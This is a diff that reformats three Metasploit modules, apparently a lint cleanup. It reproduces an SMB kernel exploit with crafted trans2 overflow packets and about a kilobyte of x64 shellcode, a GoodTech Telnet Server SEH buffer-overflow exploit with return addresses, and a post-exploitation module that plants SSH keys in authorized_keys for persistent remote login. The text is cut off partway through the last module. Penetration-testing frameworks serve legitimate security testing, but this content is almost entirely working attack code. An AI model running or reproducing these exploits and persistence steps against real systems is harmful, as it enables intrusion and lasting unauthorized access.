@@ -428,7 +432,7 @@ class MetasploitModule < Msf::Exploit::Remote
     pkt_max_payload = pkt_max_len - pkt_setup_len # 3575
 
     # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode
-    pkt = ""
+    pkt = ''
 
     # padding
     pkt << "\x00" * 0x8
@@ -440,7 +444,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # KI_USER_SHARED_DATA addresses
     pkt << "\xb0\x00\xd0\xff\xff\xff\xff\xff" * 2 # x64 address
     pkt << "\x00" * 0x10
-    pkt << "\xc0\xf0\xdf\xff" * 2                 # x86 address
+    pkt << "\xc0\xf0\xdf\xff" * 2 # x86 address
     pkt << "\x00" * 0xc4
 
     # payload addreses
@@ -477,63 +481,63 @@ class MetasploitModule < Msf::Exploit::Remote
     packet.parameter_block.flags.read("\x00\x10")
     packet.parameter_block.timeout.read(timeout_value)
 
-    packet.parameter_block.word_count       = 9
+    packet.parameter_block.word_count = 9
     packet.parameter_block.total_data_count = 4096
-    packet.parameter_block.parameter_count  = 4096
+    packet.parameter_block.parameter_count = 4096
 
     nbss = "\x00\x00\x10\x35"
-    pkt  = packet.to_binary_s
-    pkt  = pkt[0,packet.parameter_block.parameter_offset.abs_offset]
-    pkt  = nbss + pkt
+    pkt = packet.to_binary_s
+    pkt = pkt[0, packet.parameter_block.parameter_offset.abs_offset]
+    pkt = nbss + pkt
 
     case type
-      when :eb_trans2_exploit
-        vprint_status("Making :eb_trans2_exploit packet")
+    when :eb_trans2_exploit
+      vprint_status('Making :eb_trans2_exploit packet')
 
-        pkt << "\x41" * 2957
+      pkt << "\x41" * 2957
 
-        pkt << "\x80\x00\xa8\x00"                 # overflow
+      pkt << "\x80\x00\xa8\x00" # overflow
 
-        pkt << "\x00" * 0x10
-        pkt << "\xff\xff"
-        pkt << "\x00" * 0x6
-        pkt << "\xff\xff"
-        pkt << "\x00" * 0x16
+      pkt << "\x00" * 0x10
+      pkt << "\xff\xff"
+      pkt << "\x00" * 0x6
+      pkt << "\xff\xff"
+      pkt << "\x00" * 0x16
 
-        pkt << "\x00\xf1\xdf\xff"                 # x86 addresses
-        pkt << "\x00" * 0x8
-        pkt << "\x20\xf0\xdf\xff"
+      pkt << "\x00\xf1\xdf\xff" # x86 addresses
+      pkt << "\x00" * 0x8
+      pkt << "\x20\xf0\xdf\xff"
 
-        pkt << "\x00\xf1\xdf\xff\xff\xff\xff\xff" # x64
+      pkt << "\x00\xf1\xdf\xff\xff\xff\xff\xff" # x64
 
-        pkt << "\x60\x00\x04\x10"
-        pkt << "\x00" * 4
+      pkt << "\x60\x00\x04\x10"
+      pkt << "\x00" * 4
 
-        pkt << "\x80\xef\xdf\xff"
+      pkt << "\x80\xef\xdf\xff"
 
-        pkt << "\x00" * 4
-        pkt << "\x10\x00\xd0\xff\xff\xff\xff\xff"
-        pkt << "\x18\x01\xd0\xff\xff\xff\xff\xff"
-        pkt << "\x00" * 0x10
+      pkt << "\x00" * 4
+      pkt << "\x10\x00\xd0\xff\xff\xff\xff\xff"
+      pkt << "\x18\x01\xd0\xff\xff\xff\xff\xff"
+      pkt << "\x00" * 0x10
 
-        pkt << "\x60\x00\x04\x10"
-        pkt << "\x00" * 0xc
-        pkt << "\x90\xff\xcf\xff\xff\xff\xff\xff"
-        pkt << "\x00" * 0x8
-        pkt << "\x80\x10"
-        pkt << "\x00" * 0xe
-        pkt << "\x39"
-        pkt << "\xbb"
+      pkt << "\x60\x00\x04\x10"
+      pkt << "\x00" * 0xc
+      pkt << "\x90\xff\xcf\xff\xff\xff\xff\xff"
+      pkt << "\x00" * 0x8
+      pkt << "\x80\x10"
+      pkt << "\x00" * 0xe
+      pkt << "\x39"
+      pkt << "\xbb"
 
-        pkt << "\x41" * 965
-      when :eb_trans2_zero
-        vprint_status("Making :eb_trans2_zero packet")
-        pkt << "\x00" * 2055
-        pkt << "\x83\xf3"
-        pkt << "\x41" * 2039
-      else
-        vprint_status("Making :eb_trans2_buffer packet")
-        pkt << "\x41" * 4096
+      pkt << "\x41" * 965
+    when :eb_trans2_zero
+      vprint_status('Making :eb_trans2_zero packet')
+      pkt << "\x00" * 2055
+      pkt << "\x83\xf3"
+      pkt << "\x41" * 2039
+    else
+      vprint_status('Making :eb_trans2_buffer packet')
+      pkt << "\x41" * 4096
     end
     pkt
   end
@@ -547,20 +551,20 @@ class MetasploitModule < Msf::Exploit::Remote
 
     packet = set_smb1_headers(packet, tree_id, user_id)
 
-    packet.parameter_block.max_setup_count       = 1
+    packet.parameter_block.max_setup_count = 1
     packet.parameter_block.total_parameter_count = 30
-    packet.parameter_block.total_data_count      = 66512
-    packet.parameter_block.max_parameter_count   = 30
-    packet.parameter_block.max_data_count        = 0
-    packet.parameter_block.parameter_count       = 30
-    packet.parameter_block.parameter_offset      = 75
-    packet.parameter_block.data_count            = 976
-    packet.parameter_block.data_offset           = 104
-    packet.parameter_block.function              = 0
+    packet.parameter_block.total_data_count = 66512
+    packet.parameter_block.max_parameter_count = 30
+    packet.parameter_block.max_data_count = 0
+    packet.parameter_block.parameter_count = 30
+    packet.parameter_block.parameter_offset = 75
+    packet.parameter_block.data_count = 976
+    packet.parameter_block.data_offset = 104
+    packet.parameter_block.function = 0
 
     packet.parameter_block.setup << 0x0000
 
-    packet.data_block.byte_count        = 1004
+    packet.data_block.byte_count = 1004
     packet.data_block.trans2_parameters = "\x00" * 31 + "\x01" + ("\x00" * 973)
     packet
   end
@@ -571,15 +575,15 @@ class MetasploitModule < Msf::Exploit::Remote
     packet.smb_header.flags.read("\x18")
     packet.smb_header.flags2.read(flags2)
     packet.smb_header.pid_high = 65279
-    packet.smb_header.mid      = 64
+    packet.smb_header.mid = 64
 
     packet.parameter_block.vc_number.read(vcnum)
-    packet.parameter_block.max_buffer_size      = 4356
-    packet.parameter_block.max_mpx_count        = 10
+    packet.parameter_block.max_buffer_size = 4356
+    packet.parameter_block.max_mpx_count = 10
     packet.parameter_block.security_blob_length = 0
 
-    packet.data_block.native_os       = native_os
-    packet.data_block.native_lan_man  = "\x00" * 17
+    packet.data_block.native_os = native_os
+    packet.data_block.native_lan_man = "\x00" * 17
     packet
   end
 
@@ -589,9 +593,9 @@ class MetasploitModule < Msf::Exploit::Remote
   # et_alertable = ETHREAD.Alertable offset
   # teb_acp = TEB.ActivationContextPointer offset
   # et_tle = ETHREAD.ThreadListEntry offset
-  def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)
+  def make_kernel_user_payload(ring3, proc_name, _ep_thl_b, _et_alertable, _teb_acp, _et_tle)
     sc = make_kernel_shellcode(proc_name)
-    sc << [ring3.length].pack("S<")
+    sc << [ring3.length].pack('S<')
     sc << ring3
     sc
   end
@@ -601,7 +605,7 @@ class MetasploitModule < Msf::Exploit::Remote
     proc_hash = 0
     process << "\x00"
     process.each_byte do |c|
-      proc_hash  = ror(proc_hash, 13)
+      proc_hash = ror(proc_hash, 13)
       proc_hash += c
     end
     [proc_hash].pack('l<')
@@ -616,70 +620,70 @@ class MetasploitModule < Msf::Exploit::Remote
     # Length: 1019 bytes
 
     # "\xcc"+
-    "\x31\xC9\x41\xE2\x01\xC3\xB9\x82\x00\x00\xC0\x0F\x32\x48\xBB\xF8" +
-    "\x0F\xD0\xFF\xFF\xFF\xFF\xFF\x89\x53\x04\x89\x03\x48\x8D\x05\x0A" +
-    "\x00\x00\x00\x48\x89\xC2\x48\xC1\xEA\x20\x0F\x30\xC3\x0F\x01\xF8" +
-    "\x65\x48\x89\x24\x25\x10\x00\x00\x00\x65\x48\x8B\x24\x25\xA8\x01" +
-    "\x00\x00\x50\x53\x51\x52\x56\x57\x55\x41\x50\x41\x51\x41\x52\x41" +
-    "\x53\x41\x54\x41\x55\x41\x56\x41\x57\x6A\x2B\x65\xFF\x34\x25\x10" +
-    "\x00\x00\x00\x41\x53\x6A\x33\x51\x4C\x89\xD1\x48\x83\xEC\x08\x55" +
-    "\x48\x81\xEC\x58\x01\x00\x00\x48\x8D\xAC\x24\x80\x00\x00\x00\x48" +
-    "\x89\x9D\xC0\x00\x00\x00\x48\x89\xBD\xC8\x00\x00\x00\x48\x89\xB5" +
-    "\xD0\x00\x00\x00\x48\xA1\xF8\x0F\xD0\xFF\xFF\xFF\xFF\xFF\x48\x89" +
-    "\xC2\x48\xC1\xEA\x20\x48\x31\xDB\xFF\xCB\x48\x21\xD8\xB9\x82\x00" +
-    "\x00\xC0\x0F\x30\xFB\xE8\x38\x00\x00\x00\xFA\x65\x48\x8B\x24\x25" +
-    "\xA8\x01\x00\x00\x48\x83\xEC\x78\x41\x5F\x41\x5E\x41\x5D\x41\x5C" +
-    "\x41\x5B\x41\x5A\x41\x59\x41\x58\x5D\x5F\x5E\x5A\x59\x5B\x58\x65" +
-    "\x48\x8B\x24\x25\x10\x00\x00\x00\x0F\x01\xF8\xFF\x24\x25\xF8\x0F" +
-    "\xD0\xFF\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53\x55\x48\x89\xE5" +
-    "\x66\x83\xE4\xF0\x48\x83\xEC\x20\x4C\x8D\x35\xE3\xFF\xFF\xFF\x65" +
-    "\x4C\x8B\x3C\x25\x38\x00\x00\x00\x4D\x8B\x7F\x04\x49\xC1\xEF\x0C" +
-    "\x49\xC1\xE7\x0C\x49\x81\xEF\x00\x10\x00\x00\x49\x8B\x37\x66\x81" +
-    "\xFE\x4D\x5A\x75\xEF\x41\xBB\x5C\x72\x11\x62\xE8\x18\x02\x00\x00" +
-    "\x48\x89\xC6\x48\x81\xC6\x08\x03\x00\x00\x41\xBB\x7A\xBA\xA3\x30" +
-    "\xE8\x03\x02\x00\x00\x48\x89\xF1\x48\x39\xF0\x77\x11\x48\x8D\x90" +
-    "\x00\x05\x00\x00\x48\x39\xF2\x72\x05\x48\x29\xC6\xEB\x08\x48\x8B" +
-    "\x36\x48\x39\xCE\x75\xE2\x49\x89\xF4\x31\xDB\x89\xD9\x83\xC1\x04" +
-    "\x81\xF9\x00\x00\x01\x00\x0F\x8D\x66\x01\x00\x00\x4C\x89\xF2\x89" +
-    "\xCB\x41\xBB\x66\x55\xA2\x4B\xE8\xBC\x01\x00\x00\x85\xC0\x75\xDB" +
-    "\x49\x8B\x0E\x41\xBB\xA3\x6F\x72\x2D\xE8\xAA\x01\x00\x00\x48\x89" +
-    "\xC6\xE8\x50\x01\x00\x00\x41\x81\xF9" + generate_process_hash(proc_name.upcase) + "\x75\xBC\x49" +
-    "\x8B\x1E\x4D\x8D\x6E\x10\x4C\x89\xEA\x48\x89\xD9\x41\xBB\xE5\x24" +
-    "\x11\xDC\xE8\x81\x01\x00\x00\x6A\x40\x68\x00\x10\x00\x00\x4D\x8D" +
-    "\x4E\x08\x49\xC7\x01\x00\x10\x00\x00\x4D\x31\xC0\x4C\x89\xF2\x31" +
-    "\xC9\x48\x89\x0A\x48\xF7\xD1\x41\xBB\x4B\xCA\x0A\xEE\x48\x83\xEC" +
-    "\x20\xE8\x52\x01\x00\x00\x85\xC0\x0F\x85\xC8\x00\x00\x00\x49\x8B" +
-    "\x3E\x48\x8D\x35\xE9\x00\x00\x00\x31\xC9\x66\x03\x0D\xD7\x01\x00" +
-    "\x00\x66\x81\xC1\xF9\x00\xF3\xA4\x48\x89\xDE\x48\x81\xC6\x08\x03" +
-    "\x00\x00\x48\x89\xF1\x48\x8B\x11\x4C\x29\xE2\x51\x52\x48\x89\xD1" +
-    "\x48\x83\xEC\x20\x41\xBB\x26\x40\x36\x9D\xE8\x09\x01\x00\x00\x48" +
-    "\x83\xC4\x20\x5A\x59\x48\x85\xC0\x74\x18\x48\x8B\x80\xC8\x02\x00" +
-    "\x00\x48\x85\xC0\x74\x0C\x48\x83\xC2\x4C\x8B\x02\x0F\xBA\xE0\x05" +
-    "\x72\x05\x48\x8B\x09\xEB\xBE\x48\x83\xEA\x4C\x49\x89\xD4\x31\xD2" +
-    "\x80\xC2\x90\x31\xC9\x41\xBB\x26\xAC\x50\x91\xE8\xC8\x00\x00\x00" +
-    "\x48\x89\xC1\x4C\x8D\x89\x80\x00\x00\x00\x41\xC6\x01\xC3\x4C\x89" +
-    "\xE2\x49\x89\xC4\x4D\x31\xC0\x41\x50\x6A\x01\x49\x8B\x06\x50\x41" +
-    "\x50\x48\x83\xEC\x20\x41\xBB\xAC\xCE\x55\x4B\xE8\x98\x00\x00\x00" +
-    "\x31\xD2\x52\x52\x41\x58\x41\x59\x4C\x89\xE1\x41\xBB\x18\x38\x09" +
-    "\x9E\xE8\x82\x00\x00\x00\x4C\x89\xE9\x41\xBB\x22\xB7\xB3\x7D\xE8" +
-    "\x74\x00\x00\x00\x48\x89\xD9\x41\xBB\x0D\xE2\x4D\x85\xE8\x66\x00" +
-    "\x00\x00\x48\x89\xEC\x5D\x5B\x41\x5C\x41\x5D\x41\x5E\x41\x5F\x5E" +
-    "\xC3\xE9\xB5\x00\x00\x00\x4D\x31\xC9\x31\xC0\xAC\x41\xC1\xC9\x0D" +
-    "\x3C\x61\x7C\x02\x2C\x20\x41\x01\xC1\x38\xE0\x75\xEC\xC3\x31\xD2" +
-    "\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x12" +
-    "\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x45\x31\xC9\x31\xC0\xAC\x3C" +
-    "\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xEE\x45\x39" +
-    "\xD9\x75\xDA\x4C\x8B\x7A\x20\xC3\x4C\x89\xF8\x41\x51\x41\x50\x52" +
-    "\x51\x56\x48\x89\xC2\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88\x00\x00" +
-    "\x00\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\x48" +
-    "\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\xE8\x78\xFF\xFF\xFF\x45\x39" +
-    "\xD9\x75\xEC\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48" +
-    "\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x5E\x59" +
-    "\x5A\x41\x58\x41\x59\x41\x5B\x41\x53\xFF\xE0\x56\x41\x57\x55\x48" +
-    "\x89\xE5\x48\x83\xEC\x20\x41\xBB\xDA\x16\xAF\x92\xE8\x4D\xFF\xFF" +
-    "\xFF\x31\xC9\x51\x51\x51\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00" +
-    "\x5A\x48\x83\xEC\x20\x41\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF" +
-    "\x48\x89\xEC\x5D\x41\x5F\x5E\xC3"#\x01\x00\xC3"
+    "\x31\xC9\x41\xE2\x01\xC3\xB9\x82\x00\x00\xC0\x0F\x32\x48\xBB\xF8" \
+      "\x0F\xD0\xFF\xFF\xFF\xFF\xFF\x89\x53\x04\x89\x03\x48\x8D\x05\x0A" \
+      "\x00\x00\x00\x48\x89\xC2\x48\xC1\xEA\x20\x0F\x30\xC3\x0F\x01\xF8" \
+      "\x65\x48\x89\x24\x25\x10\x00\x00\x00\x65\x48\x8B\x24\x25\xA8\x01" \
+      "\x00\x00\x50\x53\x51\x52\x56\x57\x55\x41\x50\x41\x51\x41\x52\x41" \
+      "\x53\x41\x54\x41\x55\x41\x56\x41\x57\x6A\x2B\x65\xFF\x34\x25\x10" \
+      "\x00\x00\x00\x41\x53\x6A\x33\x51\x4C\x89\xD1\x48\x83\xEC\x08\x55" \
+      "\x48\x81\xEC\x58\x01\x00\x00\x48\x8D\xAC\x24\x80\x00\x00\x00\x48" \
+      "\x89\x9D\xC0\x00\x00\x00\x48\x89\xBD\xC8\x00\x00\x00\x48\x89\xB5" \
+      "\xD0\x00\x00\x00\x48\xA1\xF8\x0F\xD0\xFF\xFF\xFF\xFF\xFF\x48\x89" \
+      "\xC2\x48\xC1\xEA\x20\x48\x31\xDB\xFF\xCB\x48\x21\xD8\xB9\x82\x00" \
+      "\x00\xC0\x0F\x30\xFB\xE8\x38\x00\x00\x00\xFA\x65\x48\x8B\x24\x25" \
+      "\xA8\x01\x00\x00\x48\x83\xEC\x78\x41\x5F\x41\x5E\x41\x5D\x41\x5C" \
+      "\x41\x5B\x41\x5A\x41\x59\x41\x58\x5D\x5F\x5E\x5A\x59\x5B\x58\x65" \
+      "\x48\x8B\x24\x25\x10\x00\x00\x00\x0F\x01\xF8\xFF\x24\x25\xF8\x0F" \
+      "\xD0\xFF\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53\x55\x48\x89\xE5" \
+      "\x66\x83\xE4\xF0\x48\x83\xEC\x20\x4C\x8D\x35\xE3\xFF\xFF\xFF\x65" \
+      "\x4C\x8B\x3C\x25\x38\x00\x00\x00\x4D\x8B\x7F\x04\x49\xC1\xEF\x0C" \
+      "\x49\xC1\xE7\x0C\x49\x81\xEF\x00\x10\x00\x00\x49\x8B\x37\x66\x81" \
+      "\xFE\x4D\x5A\x75\xEF\x41\xBB\x5C\x72\x11\x62\xE8\x18\x02\x00\x00" \
+      "\x48\x89\xC6\x48\x81\xC6\x08\x03\x00\x00\x41\xBB\x7A\xBA\xA3\x30" \
+      "\xE8\x03\x02\x00\x00\x48\x89\xF1\x48\x39\xF0\x77\x11\x48\x8D\x90" \
+      "\x00\x05\x00\x00\x48\x39\xF2\x72\x05\x48\x29\xC6\xEB\x08\x48\x8B" \
+      "\x36\x48\x39\xCE\x75\xE2\x49\x89\xF4\x31\xDB\x89\xD9\x83\xC1\x04" \
+      "\x81\xF9\x00\x00\x01\x00\x0F\x8D\x66\x01\x00\x00\x4C\x89\xF2\x89" \
+      "\xCB\x41\xBB\x66\x55\xA2\x4B\xE8\xBC\x01\x00\x00\x85\xC0\x75\xDB" \
+      "\x49\x8B\x0E\x41\xBB\xA3\x6F\x72\x2D\xE8\xAA\x01\x00\x00\x48\x89" \
+      "\xC6\xE8\x50\x01\x00\x00\x41\x81\xF9" + generate_process_hash(proc_name.upcase) + "\x75\xBC\x49" \
+      "\x8B\x1E\x4D\x8D\x6E\x10\x4C\x89\xEA\x48\x89\xD9\x41\xBB\xE5\x24" \
+      "\x11\xDC\xE8\x81\x01\x00\x00\x6A\x40\x68\x00\x10\x00\x00\x4D\x8D" \
+      "\x4E\x08\x49\xC7\x01\x00\x10\x00\x00\x4D\x31\xC0\x4C\x89\xF2\x31" \
+      "\xC9\x48\x89\x0A\x48\xF7\xD1\x41\xBB\x4B\xCA\x0A\xEE\x48\x83\xEC" \
+      "\x20\xE8\x52\x01\x00\x00\x85\xC0\x0F\x85\xC8\x00\x00\x00\x49\x8B" \
+      "\x3E\x48\x8D\x35\xE9\x00\x00\x00\x31\xC9\x66\x03\x0D\xD7\x01\x00" \
+      "\x00\x66\x81\xC1\xF9\x00\xF3\xA4\x48\x89\xDE\x48\x81\xC6\x08\x03" \
+      "\x00\x00\x48\x89\xF1\x48\x8B\x11\x4C\x29\xE2\x51\x52\x48\x89\xD1" \
+      "\x48\x83\xEC\x20\x41\xBB\x26\x40\x36\x9D\xE8\x09\x01\x00\x00\x48" \
+      "\x83\xC4\x20\x5A\x59\x48\x85\xC0\x74\x18\x48\x8B\x80\xC8\x02\x00" \
+      "\x00\x48\x85\xC0\x74\x0C\x48\x83\xC2\x4C\x8B\x02\x0F\xBA\xE0\x05" \
+      "\x72\x05\x48\x8B\x09\xEB\xBE\x48\x83\xEA\x4C\x49\x89\xD4\x31\xD2" \
+      "\x80\xC2\x90\x31\xC9\x41\xBB\x26\xAC\x50\x91\xE8\xC8\x00\x00\x00" \
+      "\x48\x89\xC1\x4C\x8D\x89\x80\x00\x00\x00\x41\xC6\x01\xC3\x4C\x89" \
+      "\xE2\x49\x89\xC4\x4D\x31\xC0\x41\x50\x6A\x01\x49\x8B\x06\x50\x41" \
+      "\x50\x48\x83\xEC\x20\x41\xBB\xAC\xCE\x55\x4B\xE8\x98\x00\x00\x00" \
+      "\x31\xD2\x52\x52\x41\x58\x41\x59\x4C\x89\xE1\x41\xBB\x18\x38\x09" \
+      "\x9E\xE8\x82\x00\x00\x00\x4C\x89\xE9\x41\xBB\x22\xB7\xB3\x7D\xE8" \
+      "\x74\x00\x00\x00\x48\x89\xD9\x41\xBB\x0D\xE2\x4D\x85\xE8\x66\x00" \
+      "\x00\x00\x48\x89\xEC\x5D\x5B\x41\x5C\x41\x5D\x41\x5E\x41\x5F\x5E" \
+      "\xC3\xE9\xB5\x00\x00\x00\x4D\x31\xC9\x31\xC0\xAC\x41\xC1\xC9\x0D" \
+      "\x3C\x61\x7C\x02\x2C\x20\x41\x01\xC1\x38\xE0\x75\xEC\xC3\x31\xD2" \
+      "\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x12" \
+      "\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x45\x31\xC9\x31\xC0\xAC\x3C" \
+      "\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xEE\x45\x39" \
+      "\xD9\x75\xDA\x4C\x8B\x7A\x20\xC3\x4C\x89\xF8\x41\x51\x41\x50\x52" \
+      "\x51\x56\x48\x89\xC2\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88\x00\x00" \
+      "\x00\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\x48" \
+      "\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\xE8\x78\xFF\xFF\xFF\x45\x39" \
+      "\xD9\x75\xEC\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48" \
+      "\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x5E\x59" \
+      "\x5A\x41\x58\x41\x59\x41\x5B\x41\x53\xFF\xE0\x56\x41\x57\x55\x48" \
+      "\x89\xE5\x48\x83\xEC\x20\x41\xBB\xDA\x16\xAF\x92\xE8\x4D\xFF\xFF" \
+      "\xFF\x31\xC9\x51\x51\x51\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00" \
+      "\x5A\x48\x83\xEC\x20\x41\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF" \
+      "\x48\x89\xEC\x5D\x41\x5F\x5E\xC3" # \x01\x00\xC3"
   end
 
   # Sets common SMB1 Header values used by the various
@@ -688,10 +692,10 @@ class MetasploitModule < Msf::Exploit::Remote
   # @return [RubySMB::GenericPacket] the modified version of the packet
   def set_smb1_headers(packet, tree_id, user_id)
     packet.smb_header.flags2.read("\x07\xc0")
-    packet.smb_header.tid       = tree_id
-    packet.smb_header.uid       = user_id
-    packet.smb_header.pid_low   = 65279
-    packet.smb_header.mid       = 64
+    packet.smb_header.tid = tree_id
+    packet.smb_header.uid = user_id
+    packet.smb_header.pid_low = 65279
+    packet.smb_header.mid = 64
     packet
   end
 

--- a/modules/exploits/windows/telnet/goodtech_telnet.rb
+++ b/modules/exploits/windows/telnet/goodtech_telnet.rb
@@ -10,52 +10,57 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Seh
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'GoodTech Telnet Server Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'GoodTech Telnet Server Buffer Overflow',
+        'Description' => %q{
           This module exploits a stack buffer overflow in GoodTech Systems Telnet Server
-        versions prior to 5.0.7. By sending an overly long string, an attacker can
-        overwrite the buffer and control program execution.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => 'MC',
-      'References'     =>
-        [
-          [ 'CVE', '2005-0768' ],
-          [ 'OSVDB', '14806'],
-          [ 'BID', '12815' ],
-        ],
-      'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread',
+          versions prior to 5.0.7. By sending an overly long string, an attacker can
+          overwrite the buffer and control program execution.
         },
-      'Payload'        =>
-        {
-          'Space'    => 400,
-          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
-        },
-      'Platform' => 'win',
-      'Targets'        =>
-        [
-          [ 'Windows 2000 Pro English All',   { 'Ret' => 0x75022ac4 } ],
-          [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
-        ],
-      'Privileged'     => true,
-      'DisclosureDate' => 'Mar 15 2005',
-      'DefaultTarget'  => 0))
+        'License' => MSF_LICENSE,
+        'Author' => 'MC',
+        'References' =>
+          [
+            [ 'CVE', '2005-0768' ],
+            [ 'OSVDB', '14806'],
+            [ 'BID', '12815' ],
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread',
+          },
+        'Payload' =>
+          {
+            'Space' => 400,
+            'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+            'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
+          },
+        'Platform' => 'win',
+        'Targets' =>
+          [
+            [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],
+            [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
+          ],
+        'Privileged' => true,
+        'DisclosureDate' => 'Mar 15 2005',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(2380)
-      ])
+      ]
+    )
   end
 
   def exploit
     connect
 
     sploit = rand_text_english(10020, payload_badchars)
-    seh    = generate_seh_payload(target.ret)
+    seh = generate_seh_payload(target.ret)
 
     sploit[10012, seh.length] = seh
 

--- a/modules/post/windows/manage/sshkey_persistence.rb
+++ b/modules/post/windows/manage/sshkey_persistence.rb
@@ -15,18 +15,18 @@ class MetasploitModule < Msf::Post
     super(
       update_info(
         info,
-        'Name'           => 'SSH Key Persistence',
-        'Description'    => %q{
+        'Name' => 'SSH Key Persistence',
+        'Description' => %q{
           This module will add an SSH key to a specified user (or all), to allow
           remote login via SSH at any time.
         },
-        'License'        => MSF_LICENSE,
-        'Author'         =>
+        'License' => MSF_LICENSE,
+        'Author' =>
           [
             'Dean Welch <dean_welch[at]rapid7.com>'
           ],
-        'Platform'       => [ 'windows' ],
-        'SessionTypes'   => [ 'meterpreter', 'shell' ]
+        'Platform' => [ 'windows' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ]
       )
     )
 
@@ -63,12 +63,12 @@ class MetasploitModule < Msf::Post
 
     paths = []
     if datastore['USERNAME']
-      grab_user_profiles.each { |profile|
-        paths << "#{profile["ProfileDir"]}#{sep}#{auth_key_folder}" if profile['UserName'] == datastore['USERNAME']
-      }
+      grab_user_profiles.each do |profile|
+        paths << "#{profile['ProfileDir']}#{sep}#{auth_key_folder}" if profile['UserName'] == datastore['USERNAME']
+      end
     end
 
-    if datastore['ADMIN']    # SSH keys for admin accounts are stored in a separate location
+    if datastore['ADMIN'] # SSH keys for admin accounts are stored in a separate location
       admin_auth_key_folder = datastore['ADMIN_KEY_FILE'].split(sep)[0...-1].join(sep)
       admin_auth_key_file = datastore['ADMIN_KEY_FILE'].split(sep)[-1]
 
@@ -77,10 +77,10 @@ class MetasploitModule < Msf::Post
       write_key([admin_auth_key_folder], admin_auth_key_file, sep)
     end
 
-    if !datastore['USERNAME'] and !datastore['ADMIN']
-      grab_user_profiles.each { |profile|
+    if !datastore['USERNAME'] && !datastore['ADMIN']
+      grab_user_profiles.each do |profile|
         paths << "#{profile['ProfileDir']}#{sep}#{auth_key_folder}"
-      }
+      end
     end
 
     if datastore['CREATESSHFOLDER'] == true
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Post
   end
 
   def auth_key_file_name(sshd_config)
-    /^AuthorizedKeysFile[\s]+(?<auth_key_file>[\w%\/\.]+)/ =~ sshd_config
+    %r{^AuthorizedKeysFile[\s]+(?<auth_key_file>[\w%/\.]+)} =~ sshd_config
     if auth_key_file
       auth_key_file = auth_key_file.gsub('%h', '')
       auth_key_file = auth_key_file.gsub('%%', '%')
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Post
   end
 
   def separator
-    if session.type == "meterpreter"
+    if session.type == 'meterpreter'
       sep = session.fs.file.separator
     else
       # Guess, but it's probably right
@@ -158,7 +158,7 @@ class MetasploitModule < Msf::Post
     if datastore['PUBKEY'].nil?
       key = SSHKey.generate
       our_pub_key = key.ssh_public_key
-      loot_path = store_loot("id_rsa", "text/plain", session, key.private_key, "ssh_id_rsa", "OpenSSH Private Key File")
+      loot_path = store_loot('id_rsa', 'text/plain', session, key.private_key, 'ssh_id_rsa', 'OpenSSH Private Key File')
       print_good("Storing new private key as #{loot_path}")
     else
       our_pub_key = ::File.read(datastore['PUBKEY'])
@@ -168,24 +168,24 @@ class MetasploitModule < Msf::Post
       authorized_keys = "#{path}#{sep}#{auth_key_file}"
       print_status("Adding key to #{authorized_keys}")
       append_file(authorized_keys, "\n#{our_pub_key}")
-      print_good("Key Added")
+      print_good('Key Added')
       set_pub_key_file_permissions(authorized_keys)
-      if datastore['PUBKEY'].nil?
-        path_array = path.split(sep)
-        path_array.pop
-        user = path_array.pop
-        credential_data = {
-          origin_type: :session,
-          session_id: session_db_id,
-          post_reference_name: refname,
-          private_type: :ssh_key,
-          private_data: key.private_key.to_s,
-          username: user,
-          workspace_id: myworkspace_id
-        }
+      next unless datastore['PUBKEY'].nil?
 
-        create_credential(credential_data)
-      end
+      path_array = path.split(sep)
+      path_array.pop
+      user = path_array.pop
+      credential_data = {
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: refname,
+        private_type: :ssh_key,
